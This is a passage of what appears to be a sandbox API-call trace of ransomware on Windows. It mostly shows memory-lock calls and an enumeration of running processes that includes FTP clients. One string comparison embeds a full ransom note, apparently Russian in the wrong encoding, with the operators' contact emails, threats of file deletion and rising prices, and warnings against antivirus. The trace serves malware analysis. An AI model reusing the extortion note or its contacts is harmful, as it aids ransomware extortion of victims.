| out: lpMsg=0x18fcf0) returned 0 [0074.901] PeekMessageA (in: lpMsg=0x18fcf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fcf0) returned 0 [0074.901] PeekMessageA (in: lpMsg=0x18fcf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fcf0) returned 0 [0074.901] PeekMessageA (in: lpMsg=0x18fcf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fcf0) returned 0 [0079.703] GlobalLock (hMem=0x450004) returned 0x588f38 [0079.703] GlobalHandle (pMem=0x588f38) returned 0x450004 [0079.703] GlobalUnlock (hMem=0x450004) returned 0 [0079.704] GlobalLock (hMem=0x450004) returned 0x588f38 [0079.704] GlobalLock (hMem=0x45000c) returned 0x56f100 [0079.704] GlobalHandle (pMem=0x588f38) returned 0x450004 [0079.704] GlobalUnlock (hMem=0x450004) returned 0 [0079.704] GlobalHandle (pMem=0x56f100) returned 0x45000c [0079.704] GlobalUnlock (hMem=0x45000c) returned 0 [0079.704] GlobalLock (hMem=0x45000c) returned 0x588f38 [0079.704] GlobalHandle (pMem=0x588f38) returned 0x45000c [0079.704] GlobalUnlock (hMem=0x45000c) returned 0 [0079.704] GlobalLock (hMem=0x45000c) returned 0x588f38 [0079.704] GlobalLock (hMem=0x450004) returned 0x56f100 [0079.704] GlobalHandle (pMem=0x588f38) returned 0x45000c [0079.704] GlobalUnlock (hMem=0x45000c) returned 0 [0079.704] GlobalHandle (pMem=0x56f100) returned 0x450004 [0079.704] GlobalUnlock (hMem=0x450004) returned 0 [0079.704] GlobalLock (hMem=0x450004) returned 0x588f38 [0079.704] GlobalHandle (pMem=0x588f38) returned 0x450004 [0079.704] GlobalUnlock (hMem=0x450004) returned 0 [0079.704] GlobalLock (hMem=0x450004) returned 0x588f38 [0079.705] GlobalLock (hMem=0x45000c) returned 0x56f100 [0079.705] GlobalHandle (pMem=0x588f38) returned 0x450004 [0079.705] GlobalUnlock (hMem=0x450004) returned 0 [0079.705] GlobalHandle (pMem=0x56f100) returned 0x45000c [0079.705] GlobalUnlock (hMem=0x45000c) returned 0 [0079.705] GlobalLock (hMem=0x45000c) returned 0x588f38 [0079.705] GlobalHandle (pMem=0x588f38) returned 0x45000c [0079.705] GlobalUnlock (hMem=0x45000c) returned 0 [0079.705] GlobalLock (hMem=0x45000c) returned 0x588f38 [0079.705] GlobalLock (hMem=0x450004) returned 0x56f100 [0079.705] GlobalHandle (pMem=0x588f38) returned 0x45000c [0079.705] GlobalUnlock (hMem=0x45000c) returned 0 [0079.705] GlobalHandle (pMem=0x56f100) returned 0x450004 [0079.705] GlobalUnlock (hMem=0x450004) returned 0 [0098.608] GlobalLock (hMem=0x450004) returned 0x588f38 [0098.608] GlobalHandle (pMem=0x588f38) returned 0x450004 [0098.608] GlobalUnlock (hMem=0x450004) returned 0 [0098.608] GlobalLock (hMem=0x450004) returned 0x588f38 [0098.609] GlobalLock (hMem=0x45000c) returned 0x56f100 [0098.609] GlobalHandle (pMem=0x588f38) returned 0x450004 [0098.609] GlobalUnlock (hMem=0x450004) returned 0 [0098.609] GlobalHandle (pMem=0x56f100) returned 0x45000c [0098.609] GlobalUnlock (hMem=0x45000c) returned 0 [0098.609] GlobalLock (hMem=0x45000c) returned 0x588f38 [0098.609] GlobalHandle (pMem=0x588f38) returned 0x45000c [0098.609] GlobalUnlock (hMem=0x45000c) returned 0 [0098.609] GlobalLock (hMem=0x45000c) returned 0x588f38 [0098.609] GlobalLock (hMem=0x450004) returned 0x56f100 [0098.609] GlobalHandle (pMem=0x588f38) returned 0x45000c [0098.610] GlobalUnlock (hMem=0x45000c) returned 0 [0098.610] GlobalHandle (pMem=0x56f100) returned 0x450004 [0098.610] GlobalUnlock (hMem=0x450004) returned 0 [0098.610] GlobalLock (hMem=0x450004) returned 0x588f38 [0098.610] GlobalHandle (pMem=0x588f38) returned 0x450004 [0098.610] GlobalUnlock (hMem=0x450004) returned 0 [0098.610] GlobalLock (hMem=0x450004) returned 0x588f38 [0098.610] GlobalLock (hMem=0x45000c) returned 0x56f100 [0098.610] GlobalHandle (pMem=0x588f38) returned 0x450004 [0098.610] GlobalUnlock (hMem=0x450004) returned 0 [0098.610] GlobalHandle (pMem=0x56f100) returned 0x45000c [0098.610] GlobalUnlock (hMem=0x45000c) returned 0 [0098.610] GlobalLock (hMem=0x45000c) returned 0x588f38 [0098.610] GlobalHandle (pMem=0x588f38) returned 0x45000c [0098.610] GlobalUnlock (hMem=0x45000c) returned 0 [0098.610] GlobalLock (hMem=0x45000c) returned 0x588f38 [0098.611] GlobalLock (hMem=0x450004) returned 0x56f100 [0098.611] GlobalHandle (pMem=0x588f38) returned 0x45000c [0098.611] GlobalUnlock (hMem=0x45000c) returned 0 [0098.611] GlobalHandle (pMem=0x56f100) returned 0x450004 [0098.611] GlobalUnlock (hMem=0x450004) returned 0 [0098.611] GlobalLock (hMem=0x450004) returned 0x588f38 [0098.611] GlobalHandle (pMem=0x588f38) returned 0x450004 [0098.611] GlobalUnlock (hMem=0x450004) returned 0 [0098.611] GlobalLock (hMem=0x450004) returned 0x588f38 [0098.611] GlobalLock (hMem=0x45000c) returned 0x56f100 [0098.611] GlobalHandle (pMem=0x588f38) returned 0x450004 [0098.611] GlobalUnlock (hMem=0x450004) returned 0 [0098.611] GlobalHandle (pMem=0x56f100) returned 0x45000c [0098.611] GlobalUnlock (hMem=0x45000c) returned 0 [0098.611] GlobalLock (hMem=0x45000c) returned 0x588f38 [0098.611] GlobalHandle (pMem=0x588f38) returned 0x45000c [0098.611] GlobalUnlock (hMem=0x45000c) returned 0 [0098.611] GlobalLock (hMem=0x45000c) returned 0x588f38 [0098.611] GlobalLock (hMem=0x450004) returned 0x56f100 [0098.611] GlobalHandle (pMem=0x588f38) returned 0x45000c [0098.611] GlobalUnlock (hMem=0x45000c) returned 0 [0098.612] GlobalHandle (pMem=0x56f100) returned 0x450004 [0098.612] GlobalUnlock (hMem=0x450004) returned 0 [0098.612] GlobalLock (hMem=0x450004) returned 0x588f38 [0098.612] GlobalLock (hMem=0x45000c) returned 0x56f100 [0098.612] GlobalHandle (pMem=0x588f38) returned 0x450004 [0098.612] GlobalUnlock (hMem=0x450004) returned 0 [0098.612] GlobalHandle (pMem=0x56f100) returned 0x45000c [0098.612] GlobalUnlock (hMem=0x45000c) returned 0 [0098.612] GlobalLock (hMem=0x45000c) returned 0x588f38 [0098.612] GlobalHandle (pMem=0x588f38) returned 0x45000c [0098.612] GlobalUnlock (hMem=0x45000c) returned 0 [0098.612] GlobalLock (hMem=0x45000c) returned 0x588f38 [0098.612] GlobalHandle (pMem=0x588f38) returned 0x45000c [0098.612] GlobalUnlock (hMem=0x45000c) returned 0 [0098.613] GlobalLock (hMem=0x45000c) returned 0x588f38 [0098.613] GlobalLock (hMem=0x450004) returned 0x56f100 [0098.613] GlobalHandle (pMem=0x588f38) returned 0x45000c [0098.613] GlobalUnlock (hMem=0x45000c) returned 0 [0098.613] GlobalHandle (pMem=0x56f100) returned 0x450004 [0098.613] GlobalUnlock (hMem=0x450004) returned 0 [0098.636] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}\r\n\r\nÂàøè äîêóìåíòû, ôîòîãðàôèè, áàçû äàííûõ è äðóãèå âàæíûå ôàéëû áûëè çàøèôðîâàíû. \r\nÊàæäûå 24 ÷àñà óäàëÿþòñÿ 24 ôàéëà, íåîáõîäèìî ïðèñëàòü ñâîé èäåíòèôèêàòîð ÷òîá ìû îòêëþ÷èëè ýòó ôóíêöèþ.\r\nÊàæäûå 24 ÷àñà ñòîèìîñòü ðàñøèôðîâêè äàííûõ óâåëè÷èâàåòñÿ íà 30% (÷åðåç 72 ÷àñà ñóììà ôèêñèðóåòñÿ)\r\n\r\nÄëÿ ðàñøèôðîâêè äàííûõ:\r\n\r\nÍàïèøèòå íà ïî÷òó - scarry38@horsefucker.org\r\n \r\n * ïèñüìå óêàçàòü Âàø ëè÷íûé èäåíòèôèêàòîð\r\n *Ïðèêðåïèòå 2 ôàéëà äî 1 ìá äëÿ òåñòîâîé ðàñøèôðîâêè. \r\n ìû èõ ðàñøèôðóåì, â êà÷åñòâå äîêàçàòåëüñòâà, ÷òî ÒÎËÜÊÎ ÌÛ ìîæåì ðàñøèôðîâàòü ôàéëû.\r\n\r\nÂÀÆÍÎ! Íå ïèøèòå ñ mail.ru (ê íàì íå äîõîäÿò ïèüñìà) Èñïîëüçóéòå - yandex.ru gmail.com è ò.ä. \r\nÂñå êðîìå mail.ru\r\n\r\n -×åì áûñòðåå âû ñîîáùèòå íàì ñâîé èäåíòèôèêàòîð, òåì áûñòðåå ìû âûêëþ÷èì ïðîèçâîëüíîå óäàëåíèå ôàéëîâ.\r\n -Íàïèñàâ íàì íà ïî÷òó âû ïîëó÷èòå äàëüíåéøèå èíñòðóêöèè ïî îïëàòå.\r\n\r\n îòâåòíîì ïèñüìå Âû ïîëó÷èòå ïðîãðàììó äëÿ ðàñøèôðîâêè.\r\nÏîñëå çàïóñêà ïðîãðàììû-äåøèôðîâùèêà âñå Âàøè ôàéëû áóäóò âîññòàíîâëåíû.\r\n\r\nÌû ãàðàíòèðóåì:\r\n100% óñïåøíîå âîññòàíîâëåíèå âñåõ âàøèõ ôàéëîâ\r\n100% ãàðàíòèþ ñîîòâåòñòâèÿ\r\n100% áåçîïàñíûé è íàäåæíûé ñåðâèñ\r\n\r\nÂíèìàíèå!\r\n * Íå ïûòàéòåñü óäàëèòü ïðîãðàììó èëè çàïóñêàòü àíòèâèðóñíûå ñðåäñòâà\r\n * Ïîïûòêè ñàìîñòîÿòåëüíîé ðàñøèôðîâêè ôàéëîâ ïðèâåäóò ê ïîòåðå Âàøèõ äàííûõ\r\n * Äåøèôðàòîðû äðóãèõ ïîëüçîâàòåëåé íåñîâìåñòèìû ñ Âàøèìè äàííûìè, òàê êàê ó êàæäîãî ïîëüçîâàòåëÿ\r\nóíèêàëüíûé êëþ÷ øèôðîâàíèÿ\r\n\r\n Åñëè âàì íå îòâåòèëè â òå÷åíèè 24õ ÷àñîâ, ïèøèòå íà ðåçåðâíóþ ïî÷òó - black8201@protonmail.com\r\n====================================================================================================\r\n\r\nÂàø ëè÷íûé èäåíòèôèêàòîð\r\n\r\n{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0098.636] CompareStringA (Locale=0x400, dwCmpFlags=0x0, lpString1="{{IDENTIFIER}}", cchCount1=14, lpString2="{{IDENTIFIER}}", cchCount2=14) returned 2 [0099.011] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x18e814, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0099.011] RtlUnwind (TargetFrame=0x18fdec, TargetIp=0x403e04, ExceptionRecord=0x18f938, ReturnValue=0x0) [0099.017] GlobalLock (hMem=0x450004) returned 0x588f38 [0099.017] GlobalHandle (pMem=0x588f38) returned 0x450004 [0099.017] GlobalUnlock (hMem=0x450004) returned 0 [0099.017] GlobalLock (hMem=0x450004) returned 0x588f38 [0099.043] GlobalLock (hMem=0x45000c) returned 0x56f100 [0099.043] GlobalHandle (pMem=0x588f38) returned 0x450004 [0099.043] GlobalUnlock (hMem=0x450004) returned 0 [0099.043] GlobalHandle (pMem=0x56f100) returned 0x45000c [0099.043] GlobalUnlock (hMem=0x45000c) returned 0 [0099.043] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17c [0099.048] Process32First (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.049] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0099.049] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0099.060] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.061] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0099.061] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.062] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0099.062] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0099.063] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0099.063] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0099.064] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.064] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.065] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.067] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.068] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.068] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0099.070] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.070] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.071] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0099.071] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0099.072] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0099.072] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.073] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0099.073] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0099.074] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="avi_attach_midnight.exe")) returned 1 [0099.075] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="packs_foundation_penn.exe")) returned 1 [0099.075] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="similar-kenya-hurt.exe")) returned 1 [0099.076] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="running.exe")) returned 1 [0099.076] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ordinance jelsoft dies.exe")) returned 1 [0099.077] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="introducing_attraction_ranks.exe")) returned 1 [0099.077] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="include-assuming-employers.exe")) returned 1 [0099.078] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operateleetechnologies.exe")) returned 1 [0099.078] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mongolia.exe")) returned 1 [0099.079] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="futurevalleyturned.exe")) returned 1 [0099.079] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="besides-tba-comfortable.exe")) returned 1 [0099.080] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="extreme-quiz-standard.exe")) returned 1 [0099.080] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="sat_ipod.exe")) returned 1 [0099.084] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="well-buttons.exe")) returned 1 [0099.084] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="qty.exe")) returned 1 [0099.085] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="interesting-extends.exe")) returned 1 [0099.085] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fence.exe")) returned 1 [0099.086] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="descending.exe")) returned 1 [0099.086] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="blank.exe")) returned 1 [0099.087] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="algorithms-jefferson.exe")) returned 1 [0099.087] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0099.088] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0099.088] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0099.089] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0099.089] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0099.090] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0099.091] Process32Next (in: hSnapshot=0x17c, lppe=0x18fcbc | out: lppe=0x18fcbc*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x48c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0099.189] Process32Next (in: 